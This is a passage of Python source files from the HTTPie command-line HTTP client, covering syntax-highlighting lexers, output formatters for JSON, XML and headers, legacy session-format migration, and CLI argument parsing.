speed_based_token(lexer, match, ctx): try: value = float(match.group()) except ValueError: return pygments.token.Number for limit, token in SPEED_TOKENS.items(): if value <= limit: break else: token = pygments.token.Number.SPEED.VERY_SLOW response_type = precise( lexer, token, pygments.token.Number ) yield match.start(), response_type, match.group() class MetadataLexer(pygments.lexer.RegexLexer): """Simple HTTPie metadata lexer.""" tokens = { 'root': [ ( fr'({ELAPSED_TIME_LABEL})( *)(:)( *)(\d+\.\d+)(s)', pygments.lexer.bygroups( pygments.token.Name.Decorator, # Name pygments.token.Text, pygments.token.Operator, # Colon pygments.token.Text, speed_based_token, pygments.token.Name.Builtin # Value ) ), # Generic item ( r'(.*?)( *)(:)( *)(.+)', pygments.lexer.bygroups( pygments.token.Name.Decorator, # Name pygments.token.Text, pygments.token.Operator, # Colon pygments.token.Text, pygments.token.Text # Value ) ), ] } File: httpie/output/lexers/__init__.py File: httpie/output/lexers/common.py def precise(lexer, precise_token, parent_token): # Due to a pygments bug*, custom tokens will look bad # on outside styles. Until it is fixed on upstream, we'll # convey whether the client is using pie style or not # through precise option and return more precise tokens # depending on it's value. # # [0]: https://github.com/pygments/pygments/issues/1986 if precise_token is None or not lexer.options.get("precise"): return parent_token else: return precise_token File: httpie/output/lexers/http.py import re import pygments from httpie.output.lexers.common import precise RE_STATUS_LINE = re.compile(r'(\d{3})( +)?(.+)?') STATUS_TYPES = { '1': pygments.token.Number.HTTP.INFO, '2': pygments.token.Number.HTTP.OK, '3': pygments.token.Number.HTTP.REDIRECT, '4': pygments.token.Number.HTTP.CLIENT_ERR, '5': pygments.token.Number.HTTP.SERVER_ERR, } RESPONSE_TYPES = { 'GET': pygments.token.Name.Function.HTTP.GET, 'HEAD': pygments.token.Name.Function.HTTP.HEAD, 'POST': pygments.token.Name.Function.HTTP.POST, 'PUT': pygments.token.Name.Function.HTTP.PUT, 'PATCH': pygments.token.Name.Function.HTTP.PATCH, 'DELETE': pygments.token.Name.Function.HTTP.DELETE, } def http_response_type(lexer, match, ctx): status_match = RE_STATUS_LINE.match(match.group()) if status_match is None: return None status_code, text, reason = status_match.groups() status_type = precise( lexer, STATUS_TYPES.get(status_code[0]), pygments.token.Number ) groups = pygments.lexer.bygroups( status_type, pygments.token.Text, status_type ) yield from groups(lexer, status_match, ctx) def request_method(lexer, match, ctx): response_type = precise( lexer, RESPONSE_TYPES.get(match.group()), pygments.token.Name.Function ) yield match.start(), response_type, match.group() class SimplifiedHTTPLexer(pygments.lexer.RegexLexer): """Simplified HTTP lexer for Pygments. It only operates on headers and provides a stronger contrast between their names and values than the original one bundled with Pygments (:class:`pygments.lexers.text import HttpLexer`), especially when Solarized color scheme is used. """ name = 'HTTP' aliases = ['http'] filenames = ['*.http'] tokens = { 'root': [ # Request-Line (r'([A-Z]+)( +)([^ ]+)( +)(HTTP)(/)(\d+\.\d+)', pygments.lexer.bygroups( request_method, pygments.token.Text, pygments.token.Name.Namespace, pygments.token.Text, pygments.token.Keyword.Reserved, pygments.token.Operator, pygments.token.Number )), # Response Status-Line (r'(HTTP)(/)(\d+\.\d+)( +)(.+)', pygments.lexer.bygroups( pygments.token.Keyword.Reserved, # 'HTTP' pygments.token.Operator, # '/' pygments.token.Number, # Version pygments.token.Text, http_response_type, # Status code and Reason )), # Header (r'(.*?)( *)(:)( *)(.+)', pygments.lexer.bygroups( pygments.token.Name.Attribute, # Name pygments.token.Text, pygments.token.Operator, # Colon pygments.token.Text, pygments.token.String # Value )) ] } File: httpie/output/lexers/json.py import re from pygments.lexer import bygroups, using, RegexLexer from pygments.lexers.data import JsonLexer from pygments.token import Token PREFIX_TOKEN = Token.Error PREFIX_REGEX = r'[^{\["]+' class EnhancedJsonLexer(RegexLexer): """ Enhanced JSON lexer for Pygments. It adds support for eventual data prefixing the actual JSON body. """ name = 'JSON' flags = re.IGNORECASE | re.DOTALL tokens = { 'root': [ # Eventual non-JSON data prefix followed by actual JSON body. # FIX: data prefix + number (integer or float) is not correctly handled. ( fr'({PREFIX_REGEX})' + r'((?:[{\["]|true|false|null).+)', bygroups(PREFIX_TOKEN, using(JsonLexer)) ), # JSON body. (r'.+', using(JsonLexer)), ], } File: httpie/output/formatters/xml.py from typing import TYPE_CHECKING, Optional from ...encoding import UTF8 from ...plugins import FormatterPlugin if TYPE_CHECKING: from xml.dom.minidom import Document XML_DECLARATION_OPEN = '<?xml' XML_DECLARATION_CLOSE = '?>' def parse_xml(data: str) -> 'Document': """Parse given XML `data` string into an appropriate :class:`~xml.dom.minidom.Document` object.""" from defusedxml.minidom import parseString return parseString(data) def parse_declaration(raw_body: str) -> Optional[str]: body = raw_body.strip() # XMLDecl ::= '<?xml' DECL_CONTENT '?>' if body.startswith(XML_DECLARATION_OPEN): end = body.find(XML_DECLARATION_CLOSE) if end != -1: return body[:end + len(XML_DECLARATION_CLOSE)] def pretty_xml(document: 'Document', declaration: Optional[str] = None, encoding: Optional[str] = UTF8, indent: int = 2) -> str: """Render the given :class:`~xml.dom.minidom.Document` `document` into a prettified string.""" kwargs = { 'encoding': encoding or UTF8, 'indent': ' ' * indent, } body = document.toprettyxml(**kwargs).decode(kwargs['encoding']) # Remove blank lines automatically added by `toprettyxml()`. lines = [line for line in body.splitlines() if line.strip()] # xml.dom automatically adds the declaration, even if # it is not present in the actual body. Remove it. if len(lines) >= 1 and parse_declaration(lines[0]): lines.pop(0) if declaration: lines.insert(0, declaration) return '\n'.join(lines) class XMLFormatter(FormatterPlugin): def __init__(self, **kwargs): super().__init__(**kwargs) self.enabled = self.format_options['xml']['format'] def format_body(self, body: str, mime: str): if 'xml' not in mime: return body from xml.parsers.expat import ExpatError from defusedxml.common import DefusedXmlException declaration = parse_declaration(body) try: parsed_body = parse_xml(body) except ExpatError: pass # Invalid XML, ignore. except DefusedXmlException: pass # Unsafe XML, ignore. else: body = pretty_xml(parsed_body, encoding=parsed_body.encoding, indent=self.format_options['xml']['indent'], declaration=declaration) return body File: httpie/output/formatters/__init__.py File: httpie/output/formatters/headers.py from ...plugins import FormatterPlugin class HeadersFormatter(FormatterPlugin): def __init__(self, **kwargs): super().__init__(**kwargs) self.enabled = self.format_options['headers']['sort'] def format_headers(self, headers: str) -> str: """ Sorts headers by name while retaining relative order of multiple headers with the same name. """ lines = headers.splitlines() headers = sorted(lines[1:], key=lambda h: h.split(':')[0]) return '\r\n'.join(lines[:1] + headers) File: httpie/output/formatters/json.py import json from ...plugins import FormatterPlugin class JSONFormatter(FormatterPlugin): def __init__(self, **kwargs): super().__init__(**kwargs) self.enabled = self.format_options['json']['format'] def format_body(self, body: str, mime: str) -> str: maybe_json = [ 'json', 'javascript', 'text', ] if (self.kwargs['explicit_json'] or any(token in mime for token in maybe_json)): from ..utils import load_prefixed_json try: data_prefix, json_obj = load_prefixed_json(body) except ValueError: pass # Invalid JSON, ignore. else: # Indent, sort keys by name, and avoid # unicode escapes to improve readability. body = data_prefix + json.dumps( obj=json_obj, sort_keys=self.format_options['json']['sort_keys'], ensure_ascii=False, indent=self.format_options['json']['indent'] ) return body File: httpie/output/formatters/colors.py import json from typing import Optional, Type, Tuple import pygments.formatters import pygments.lexer import pygments.lexers import pygments.style import pygments.styles import pygments.token from pygments.formatters.terminal import TerminalFormatter from pygments.formatters.terminal256 import Terminal256Formatter from pygments.lexer import Lexer from pygments.lexers.data import JsonLexer from pygments.lexers.special import TextLexer from pygments.lexers.text import HttpLexer as PygmentsHttpLexer from pygments.util import ClassNotFound from ..lexers.json import EnhancedJsonLexer from ..lexers.metadata import MetadataLexer from ..ui.palette import AUTO_STYLE, SHADE_TO_PIE_STYLE, PieColor, ColorString, get_color from ...context import Environment from ...plugins import FormatterPlugin DEFAULT_STYLE = AUTO_STYLE SOLARIZED_STYLE = 'solarized' # Bundled here PYGMENTS_BOLD = ColorString('bold') PYGMENTS_ITALIC = ColorString('italic') BUNDLED_STYLES = { SOLARIZED_STYLE, AUTO_STYLE } def get_available_styles(): return sorted(BUNDLED_STYLES | set(pygments.styles.get_all_styles())) class ColorFormatter(FormatterPlugin): """ Colorize using Pygments This processor that applies syntax highlighting to the headers, and also to the body if its content type is recognized. """ group_name = 'colors' metadata_lexer = MetadataLexer() def __init__( self, env: Environment, explicit_json=False, color_scheme=DEFAULT_STYLE, **kwargs ): super().__init__(**kwargs) if not env.colors: self.enabled = False return use_auto_style = color_scheme == AUTO_STYLE has_256_colors = env.colors == 256 if use_auto_style or not has_256_colors: http_lexer = PygmentsHttpLexer() body_formatter = header_formatter = TerminalFormatter() precise = False else: from ..lexers.http import SimplifiedHTTPLexer header_formatter, body_formatter, precise = self.get_formatters(color_scheme) http_lexer = SimplifiedHTTPLexer(precise=precise) self.explicit_json = explicit_json # --json self.header_formatter = header_formatter self.body_formatter = body_formatter self.http_lexer = http_lexer self.metadata_lexer = MetadataLexer(precise=precise) def format_headers(self, headers: str) -> str: return pygments.highlight( code=headers, lexer=self.http_lexer, formatter=self.header_formatter, ).strip() def format_body(self, body: str, mime: str) -> str: lexer = self.get_lexer_for_body(mime, body) if lexer: body = pygments.highlight( code=body, lexer=lexer, formatter=self.body_formatter, ) return body def format_metadata(self, metadata: str) -> str: return pygments.highlight( code=metadata, lexer=self.metadata_lexer, formatter=self.header_formatter, ).strip() def get_lexer_for_body( self, mime: str, body: str ) -> Optional[Type[Lexer]]: return get_lexer( mime=mime, explicit_json=self.explicit_json, body=body, ) def get_formatters(self, color_scheme: str) -> Tuple[ pygments.formatter.Formatter, pygments.formatter.Formatter, bool ]: if color_scheme in PIE_STYLES: header_style, body_style = PIE_STYLES[color_scheme] precise = True else: header_style = self.get_style_class(color_scheme) body_style = header_style precise = False return ( Terminal256Formatter(style=header_style), Terminal256Formatter(style=body_style), precise ) @staticmethod def get_style_class(color_scheme: str) -> Type[pygments.style.Style]: try: return pygments.styles.get_style_by_name(color_scheme) except ClassNotFound: return Solarized256Style def get_lexer( mime: str, explicit_json=False, body='' ) -> Optional[Type[Lexer]]: # Build candidate mime type and lexer names. mime_types, lexer_names = [mime], [] type_, subtype = mime.split('/', 1) if '+' not in subtype: lexer_names.append(subtype) else: subtype_name, subtype_suffix = subtype.split('+', 1) lexer_names.extend([subtype_name, subtype_suffix]) mime_types.extend([ f'{type_}/{subtype_name}', f'{type_}/{subtype_suffix}', ]) # As a last resort, if no lexer feels responsible, and # the subtype contains 'json', take the JSON lexer if 'json' in subtype: lexer_names.append('json') # Try to resolve the right lexer. lexer = None for mime_type in mime_types: try: lexer = pygments.lexers.get_lexer_for_mimetype(mime_type) break except ClassNotFound: pass else: for name in lexer_names: try: lexer = pygments.lexers.get_lexer_by_name(name) except ClassNotFound: pass if explicit_json and body and (not lexer or isinstance(lexer, TextLexer)): # JSON response with an incorrect Content-Type? try: json.loads(body) # FIXME: the body also gets parsed in json.py except ValueError: pass # Nope else: lexer = pygments.lexers.get_lexer_by_name('json') # Use our own JSON lexer: it supports JSON bodies preceded by non-JSON data # as well as legit JSON bodies. if isinstance(lexer, JsonLexer): lexer = EnhancedJsonLexer() return lexer class Solarized256Style(pygments.style.Style): """ solarized256 ------------ A Pygments style inspired by Solarized's 256 color mode. :copyright: (c) 2011 by Hank Gay, (c) 2012 by John Mastro. :license: BSD, see LICENSE for more details. """ BASE03 = "#1c1c1c" BASE02 = "#262626" BASE01 = "#4e4e4e" BASE00 = "#585858" BASE0 = "#808080" BASE1 = "#8a8a8a" BASE2 = "#d7d7af" BASE3 = "#ffffd7" YELLOW = "#af8700" ORANGE = "#d75f00" RED = "#af0000" MAGENTA = "#af005f" VIOLET = "#5f5faf" BLUE = "#0087ff" CYAN = "#00afaf" GREEN = "#5f8700" background_color = BASE03 styles = { pygments.token.Keyword: GREEN, pygments.token.Keyword.Constant: ORANGE, pygments.token.Keyword.Declaration: BLUE, pygments.token.Keyword.Namespace: ORANGE, pygments.token.Keyword.Reserved: BLUE, pygments.token.Keyword.Type: RED, pygments.token.Name.Attribute: BASE1, pygments.token.Name.Builtin: BLUE, pygments.token.Name.Builtin.Pseudo: BLUE, pygments.token.Name.Class: BLUE, pygments.token.Name.Constant: ORANGE, pygments.token.Name.Decorator: BLUE, pygments.token.Name.Entity: ORANGE, pygments.token.Name.Exception: YELLOW, pygments.token.Name.Function: BLUE, pygments.token.Name.Tag: BLUE, pygments.token.Name.Variable: BLUE, pygments.token.String: CYAN, pygments.token.String.Backtick: BASE01, pygments.token.String.Char: CYAN, pygments.token.String.Doc: CYAN, pygments.token.String.Escape: RED, pygments.token.String.Heredoc: CYAN, pygments.token.String.Regex: RED, pygments.token.Number: CYAN, pygments.token.Operator: BASE1, pygments.token.Operator.Word: GREEN, pygments.token.Comment: BASE01, pygments.token.Comment.Preproc: GREEN, pygments.token.Comment.Special: GREEN, pygments.token.Generic.Deleted: CYAN, pygments.token.Generic.Emph: PYGMENTS_ITALIC, pygments.token.Generic.Error: RED, pygments.token.Generic.Heading: ORANGE, pygments.token.Generic.Inserted: GREEN, pygments.token.Generic.Strong: PYGMENTS_BOLD, pygments.token.Generic.Subheading: ORANGE, pygments.token.Token: BASE1, pygments.token.Token.Other: ORANGE, } PIE_HEADER_STYLE = { # HTTP line / Headers / Etc. pygments.token.Name.Namespace: PYGMENTS_BOLD | PieColor.PRIMARY, pygments.token.Keyword.Reserved: PYGMENTS_BOLD | PieColor.GREY, pygments.token.Operator: PYGMENTS_BOLD | PieColor.GREY, pygments.token.Number: PYGMENTS_BOLD | PieColor.GREY, pygments.token.Name.Function.Magic: PYGMENTS_BOLD | PieColor.GREEN, pygments.token.Name.Exception: PYGMENTS_BOLD | PieColor.GREEN, pygments.token.Name.Attribute: PieColor.BLUE, pygments.token.String: PieColor.PRIMARY, # HTTP Methods pygments.token.Name.Function: PYGMENTS_BOLD | PieColor.GREY, pygments.token.Name.Function.HTTP.GET: PYGMENTS_BOLD | PieColor.GREEN, pygments.token.Name.Function.HTTP.HEAD: PYGMENTS_BOLD | PieColor.GREEN, pygments.token.Name.Function.HTTP.POST: PYGMENTS_BOLD | PieColor.YELLOW, pygments.token.Name.Function.HTTP.PUT: PYGMENTS_BOLD | PieColor.ORANGE, pygments.token.Name.Function.HTTP.PATCH: PYGMENTS_BOLD | PieColor.ORANGE, pygments.token.Name.Function.HTTP.DELETE: PYGMENTS_BOLD | PieColor.RED, # HTTP status codes pygments.token.Number.HTTP.INFO: PYGMENTS_BOLD | PieColor.AQUA, pygments.token.Number.HTTP.OK: PYGMENTS_BOLD | PieColor.GREEN, pygments.token.Number.HTTP.REDIRECT: PYGMENTS_BOLD | PieColor.YELLOW, pygments.token.Number.HTTP.CLIENT_ERR: PYGMENTS_BOLD | PieColor.ORANGE, pygments.token.Number.HTTP.SERVER_ERR: PYGMENTS_BOLD | PieColor.RED, # Metadata pygments.token.Name.Decorator: PieColor.GREY, pygments.token.Number.SPEED.FAST: PYGMENTS_BOLD | PieColor.GREEN, pygments.token.Number.SPEED.AVG: PYGMENTS_BOLD | PieColor.YELLOW, pygments.token.Number.SPEED.SLOW: PYGMENTS_BOLD | PieColor.ORANGE, pygments.token.Number.SPEED.VERY_SLOW: PYGMENTS_BOLD | PieColor.RED, } PIE_BODY_STYLE = { # {}[]: pygments.token.Punctuation: PieColor.GREY, # Keys pygments.token.Name.Tag: PieColor.PINK, # Values pygments.token.Literal.String: PieColor.GREEN, pygments.token.Literal.String.Double: PieColor.GREEN, pygments.token.Literal.Number: PieColor.AQUA, pygments.token.Keyword: PieColor.ORANGE, # Other stuff pygments.token.Text: PieColor.PRIMARY, pygments.token.Name.Attribute: PieColor.PRIMARY, pygments.token.Name.Builtin: PieColor.BLUE, pygments.token.Name.Builtin.Pseudo: PieColor.BLUE, pygments.token.Name.Class: PieColor.BLUE, pygments.token.Name.Constant: PieColor.ORANGE, pygments.token.Name.Decorator: PieColor.BLUE, pygments.token.Name.Entity: PieColor.ORANGE, pygments.token.Name.Exception: PieColor.YELLOW, pygments.token.Name.Function: PieColor.BLUE, pygments.token.Name.Variable: PieColor.BLUE, pygments.token.String: PieColor.AQUA, pygments.token.String.Backtick: PieColor.SECONDARY, pygments.token.String.Char: PieColor.AQUA, pygments.token.String.Doc: PieColor.AQUA, pygments.token.String.Escape: PieColor.RED, pygments.token.String.Heredoc: PieColor.AQUA, pygments.token.String.Regex: PieColor.RED, pygments.token.Number: PieColor.AQUA, pygments.token.Operator: PieColor.PRIMARY, pygments.token.Operator.Word: PieColor.GREEN, pygments.token.Comment: PieColor.SECONDARY, pygments.token.Comment.Preproc: PieColor.GREEN, pygments.token.Comment.Special: PieColor.GREEN, pygments.token.Generic.Deleted: PieColor.AQUA, pygments.token.Generic.Emph: PYGMENTS_ITALIC, pygments.token.Generic.Error: PieColor.RED, pygments.token.Generic.Heading: PieColor.ORANGE, pygments.token.Generic.Inserted: PieColor.GREEN, pygments.token.Generic.Strong: PYGMENTS_BOLD, pygments.token.Generic.Subheading: PieColor.ORANGE, pygments.token.Token: PieColor.PRIMARY, pygments.token.Token.Other: PieColor.ORANGE, } def make_style(name, raw_styles, shade): def format_value(value): return ' '.join( get_color(part, shade) or part for part in value.split() ) bases = (pygments.style.Style,) data = { 'styles': { key: format_value(value) for key, value in raw_styles.items() } } return type(name, bases, data) def make_styles(): styles = {} for shade, name in SHADE_TO_PIE_STYLE.items(): styles[name] = [ make_style(name, style_map, shade) for style_name, style_map in [ (f'Pie{name}HeaderStyle', PIE_HEADER_STYLE), (f'Pie{name}BodyStyle', PIE_BODY_STYLE), ] ] return styles PIE_STYLES = make_styles() PIE_STYLE_NAMES = list(PIE_STYLES.keys()) BUNDLED_STYLES |= PIE_STYLES.keys() File: httpie/legacy/v3_2_0_session_header_format.py from typing import Any, Type, List, Dict, TYPE_CHECKING if TYPE_CHECKING: from httpie.sessions import Session OLD_HEADER_STORE_WARNING = '''\ Outdated layout detected for the current session. Please consider updating it, in order to use the latest features regarding the header layout. For fixing the current session: $ httpie cli sessions upgrade {hostname} {session_id} ''' OLD_HEADER_STORE_WARNING_FOR_NAMED_SESSIONS = '''\ For fixing all named sessions: $ httpie cli sessions upgrade-all ''' OLD_HEADER_STORE_LINK = '\nSee $INSERT_LINK for more information.' def pre_process(session: 'Session', headers: Any) -> List[Dict[str, Any]]: """Serialize the headers into a unified form and issue a warning if the session file is using the old layout.""" is_old_style = isinstance(headers, dict) if is_old_style: normalized_headers = list(headers.items()) else: normalized_headers = [ (item['name'], item['value']) for item in headers ] if is_old_style: warning = OLD_HEADER_STORE_WARNING.format(hostname=session.bound_host, session_id=session.session_id) if not session.is_anonymous: warning += OLD_HEADER_STORE_WARNING_FOR_NAMED_SESSIONS warning += OLD_HEADER_STORE_LINK session.warn_legacy_usage(warning) return normalized_headers def post_process( normalized_headers: List[Dict[str, Any]], *, original_type: Type[Any] ) -> Any: """Deserialize given header store into the original form it was used in.""" if issubclass(original_type, dict): # For the legacy behavior, preserve the last value. return { item['name']: item['value'] for item in normalized_headers } else: return normalized_headers def fix_layout(session: 'Session', *args, **kwargs) -> None: from httpie.sessions import materialize_headers if not isinstance(session['headers'], dict): return None session['headers'] = materialize_headers(session['headers']) File: httpie/legacy/v3_1_0_session_cookie_format.py import argparse from typing import Any, Type, List, Dict, TYPE_CHECKING if TYPE_CHECKING: from httpie.sessions import Session INSECURE_COOKIE_JAR_WARNING = '''\ Outdated layout detected for the current session. Please consider updating it, in order to not get affected by potential security problems. For fixing the current session: With binding all cookies to the current host (secure): $ httpie cli sessions upgrade --bind-cookies {hostname} {session_id} Without binding cookies (leaving them as is) (insecure): $ httpie cli sessions upgrade {hostname} {session_id} ''' INSECURE_COOKIE_JAR_WARNING_FOR_NAMED_SESSIONS = '''\ For fixing all named sessions: With binding all cookies to the current host (secure): $ httpie cli sessions upgrade-all --bind-cookies Without binding cookies (leaving them as is) (insecure): $ httpie cli sessions upgrade-all ''' INSECURE_COOKIE_SECURITY_LINK = '\nSee https://pie.co/docs/security for more information.' def pre_process(session: 'Session', cookies: Any) -> List[Dict[str, Any]]: """Load the given cookies to the cookie jar while maintaining support for the old cookie layout.""" is_old_style = isinstance(cookies, dict) if is_old_style: normalized_cookies = [ { 'name': key, **value } for key, value in cookies.items() ] else: normalized_cookies = cookies should_issue_warning = is_old_style and any( cookie.get('domain', '') == '' for cookie in normalized_cookies ) if should_issue_warning: warning = INSECURE_COOKIE_JAR_WARNING.format(hostname=session.bound_host, session_id=session.session_id) if not session.is_anonymous: warning += INSECURE_COOKIE_JAR_WARNING_FOR_NAMED_SESSIONS warning += INSECURE_COOKIE_SECURITY_LINK session.warn_legacy_usage(warning) return normalized_cookies def post_process( normalized_cookies: List[Dict[str, Any]], *, original_type: Type[Any] ) -> Any: """Convert the cookies to their original format for maximum compatibility.""" if issubclass(original_type, dict): return { cookie.pop('name'): cookie for cookie in normalized_cookies } else: return normalized_cookies def fix_layout(session: 'Session', hostname: str, args: argparse.Namespace) -> None: if not isinstance(session['cookies'], dict): return None session['cookies'] = [ { 'name': key, **value } for key, value in session['cookies'].items() ] for cookie in session.cookies: if cookie.domain == '': if args.bind_cookies: cookie.domain = hostname else: cookie._rest['is_explicit_none'] = True File: httpie/legacy/__init__.py File: httpie/cli/argtypes.py import argparse import getpass import os import sys from copy import deepcopy from typing import List, Optional, Union from .constants import DEFAULT_FORMAT_OPTIONS, SEPARATOR_CREDENTIALS from ..sessions import VALID_SESSION_NAME_PATTERN class KeyValueArg: """Base key-value pair parsed from CLI.""" def __init__(self, key: str, value: Optional[str], sep: str, orig: str): self.key = key self.value = value self.sep = sep self.orig = orig def __eq__(self, other: 'KeyValueArg'): return self.__dict__ == other.__dict__ def __repr__(self): return repr(self.__dict__) class SessionNameValidator: def __init__(self, error_message: str): self.error_message = error_message def __call__(self, value: str) -> str: # Session name can be a path or just a name. if (os.path.sep not in value and not VALID_SESSION_NAME_PATTERN.search(value)): raise argparse.ArgumentError(None, self.error_message) return value class Escaped(str): """Represents an escaped character.""" def __repr__(self): return f"Escaped({repr(str(self))})" class KeyValueArgType: """A key-value pair argument type used with `argparse`. Parses a key-value arg and constructs a `KeyValueArg` instance. Used for headers, form data, and other key-value pair types. """ key_value_class = KeyValueArg def __init__(self, *separators: str): self.separators = separators self.special_characters = set() for separator in separators: self.special_characters.update(separator) def __call__(self, s: str) -> KeyValueArg: """Parse raw string arg and return `self.key_value_class` instance. The best of `self.separators` is determined (first found, longest). Back slash escaped characters aren't considered as separators (or parts thereof). Literal back slash characters have to be escaped as well (r'\\'). """ tokens = self.tokenize(s) # Sorting by length ensures that the longest one will be # chosen as it will overwrite any shorter ones starting # at the same position in the `found` dictionary. separators = sorted(self.separators, key=len) for i, token in enumerate(tokens): if isinstance(token, Escaped): continue found = {} for sep in separators: pos = token.find(sep) if pos != -1: found[pos] = sep if found: # Starting first, longest separator found. sep = found[min(found.keys())] key, value = token.split(sep, 1) # Any preceding tokens are part of the key. key = ''.join(tokens[:i]) + key # Any following tokens are part of the value. value += ''.join(tokens[i + 1:]) break else: raise argparse.ArgumentTypeError(f'{s!r} is not a valid value') return self.key_value_class(key=key, value=value, sep=sep, orig=s) def tokenize(self, s: str) -> List[Union[str, Escaped]]: r"""Tokenize the raw arg string There are only two token types - strings and escaped characters: >>> KeyValueArgType('=').tokenize(r'foo\=bar\\baz') ['foo', Escaped('='), 'bar\\\\baz'] """ tokens = [''] characters = iter(s) for char in characters: if char == '\\': char = next(characters, '') if char not in self.special_characters: tokens[-1] += '\\' + char else: tokens.extend([Escaped(char), '']) else: tokens[-1] += char return tokens class PromptMixin: def _prompt_password(self, prompt: str) -> str: prompt_text = f'http: {prompt}: ' try: return self._getpass(prompt_text) except (EOFError, KeyboardInterrupt): sys.stderr.write('\n') sys.exit(0) @staticmethod def _getpass(prompt): # To allow easy mocking. return getpass.getpass(str(prompt)) class SSLCredentials(PromptMixin): """Represents the passphrase for the certificate's key.""" def __init__(self, value: Optional[str]) -> None: self.value = value def prompt_password(self, key_file: str) -> None: self.value = self._prompt_password(f'passphrase for {key_file}') class AuthCredentials(KeyValueArg, PromptMixin): """Represents parsed credentials.""" def has_password(self) -> bool: return self.value is not None def prompt_password(self, host: str) -> None: self.value = self._prompt_password(f'password for {self.key}@{host}:') class AuthCredentialsArgType(KeyValueArgType): """A key-value arg type that parses credentials.""" key_value_class = AuthCredentials def __call__(self, s): """Parse credentials from `s`. ("username" or "username:password"). """ try: return super().__call__(s) except argparse.ArgumentTypeError: # No password provided, will prompt for it later. return self.key_value_class( key=s, value=None, sep=SEPARATOR_CREDENTIALS, orig=s ) parse_auth = AuthCredentialsArgType(SEPARATOR_CREDENTIALS) def readable_file_arg(filename): try: with open(filename, 'rb'): return filename except OSError as ex: raise argparse.ArgumentTypeError(f'{ex.filename}: {ex.strerror}') def parse_format_options(s: str, defaults: Optional[dict]) -> dict: """ Parse `s` and update `defaults` with the parsed values. >>> parse_format_options( ... defaults={'json': {'indent': 4, 'sort_keys': True}}, ... s='json.indent:2,json.sort_keys:False', ... ) {'json': {'indent': 2, 'sort_keys': False}} """ value_map = { 'true': True, 'false': False, } options = deepcopy(defaults or {}) for option in s.split(','): try: path, value = option.lower().split(':') section, key = path.split('.') except ValueError: raise argparse.ArgumentTypeError(f'invalid option {option!r}') if value in value_map: parsed_value = value_map[value] else: if value.isnumeric(): parsed_value = int(value) else: parsed_value = value if defaults is None: options.setdefault(section, {}) else: try: default_value = defaults[section][key] except KeyError: raise argparse.ArgumentTypeError( f'invalid key {path!r}') default_type, parsed_type = type(default_value), type(parsed_value) if parsed_type is not default_type: raise argparse.ArgumentTypeError( 'invalid value' f' {value!r} in {option!r}' f' (expected {default_type.__name__}' f' got {parsed_type.__name__})' ) options[section][key] = parsed_value return options PARSED_DEFAULT_FORMAT_OPTIONS = parse_format_options( s=','.join(DEFAULT_FORMAT_OPTIONS), defaults=None, ) def response_charset_type(encoding: str) -> str: try: ''.encode(encoding) except LookupError: raise argparse.ArgumentTypeError( f'{encoding!r} is not a supported encoding') return encoding def response_mime_type(mime_type: str) -> str: if mime_type.count('/') != 1: raise argparse.ArgumentTypeError( f'{mime_type!r} doesn’t look like a mime type; use type/subtype') return mime_type File: httpie/cli/options.py import argparse import textwrap import typing from dataclasses import dataclass, field from enum import Enum, auto from typing import Any, Optional, Dict, List, Tuple, Type, TypeVar from httpie.cli.argparser import HTTPieArgumentParser from httpie.cli.utils import Manual, LazyChoices class Qualifiers(Enum): OPTIONAL = auto() ZERO_OR_MORE = auto() ONE_OR_MORE = auto() SUPPRESS = auto() def map_qualifiers( configuration: Dict[str, Any], qualifier_map: Dict[Qualifiers, Any] ) -> Dict[str, Any]: return { key: qualifier_map[value] if isinstance(value, Qualifiers) else value for key, value in configuration.items() } def drop_keys( configuration: Dict[str, Any], key_blacklist: Tuple[str, ...] ): return { key: value for key, value in configuration.items() if key not in key_blacklist } PARSER_SPEC_VERSION = '0.0.1a0' @dataclass class ParserSpec: program: str description: Optional[str] = None epilog: Optional[str] = None groups: List['Group'] = field(default_factory=list) man_page_hint: Optional[str] = None source_file: Optional[str] = None def finalize(self) -> 'ParserSpec': if self.description: self.description = textwrap.dedent(self.description) if self.epilog: self.epilog = textwrap.dedent(self.epilog) for group in self.groups: group.finalize() return self def add_group(self, name: str, **kwargs) -> 'Group': group = Group(name, **kwargs) self.groups.append(group) return group def serialize(self) -> Dict[str, Any]: return { 'name': self.program, 'description': self.description, 'groups': [group.serialize() for group in self.groups], } @dataclass class Group: name: str description: str = '' is_mutually_exclusive: bool = False arguments: List['Argument'] = field(default_factory=list) def finalize(self) -> None: if self.description: self.description = textwrap.dedent(self.description) def add_argument(self, *args, **kwargs): argument = Argument(list(args), kwargs.copy()) argument.post_init() self.arguments.append(argument) return argument def serialize(self) -> Dict[str, Any]: return { 'name': self.name, 'description': self.description or None, 'is_mutually_exclusive': self.is_mutually_exclusive, 'args': [argument.serialize() for argument in self.arguments], } class Argument(typing.NamedTuple): aliases: List[str] configuration: Dict[str, Any] def post_init(self): """Run a bunch of post-init hooks.""" # If there is a short help, then create the longer version from it. short_help = self.configuration.get('short_help') if ( short_help and 'help' not in self.configuration and self.configuration.get('action') != 'lazy_choices' ): self.configuration['help'] = f'\n{short_help}\n\n' def serialize(self, *, isolation_mode: bool = False) -> Dict[str, Any]: configuration = self.configuration.copy() # Unpack the dynamically computed choices, since we # will need to store the actual values somewhere. action = configuration.pop('action', None) short_help = configuration.pop('short_help', None) nested_options = configuration.pop('nested_options', None) if action == 'lazy_choices': choices = LazyChoices( self.aliases, **{'dest': None, **configuration}, isolation_mode=isolation_mode ) configuration['choices'] = list(choices.load()) configuration['help'] = choices.help result = {} if self.aliases: result['options'] = self.aliases.copy() else: result['options'] = [configuration['metavar']] result['is_positional'] = True qualifiers = JSON_QUALIFIER_TO_OPTIONS[configuration.get('nargs', Qualifiers.SUPPRESS)] result.update(qualifiers) description = configuration.get('help') if description and description is not Qualifiers.SUPPRESS: result['short_description'] = short_help result['description'] = description if nested_options: result['nested_options'] = nested_options python_type = configuration.get('type') if python_type is not None: if hasattr(python_type, '__name__'): type_name = python_type.__name__ else: type_name = type(python_type).__name__ result['python_type_name'] = type_name result.update({ key: value for key, value in configuration.items() if key in JSON_DIRECT_MIRROR_OPTIONS if value is not Qualifiers.SUPPRESS }) return result @property def is_positional(self): return len(self.aliases) == 0 @property def is_hidden(self): return self.configuration.get('help') is Qualifiers.SUPPRESS def __getattr__(self, attribute_name): if attribute_name in self.configuration: return self.configuration[attribute_name] else: raise AttributeError(attribute_name) ParserType = TypeVar('ParserType', bound=Type[argparse.ArgumentParser]) ARGPARSE_QUALIFIER_MAP = { Qualifiers.OPTIONAL: argparse.OPTIONAL, Qualifiers.SUPPRESS: argparse.SUPPRESS, Qualifiers.ZERO_OR_MORE: 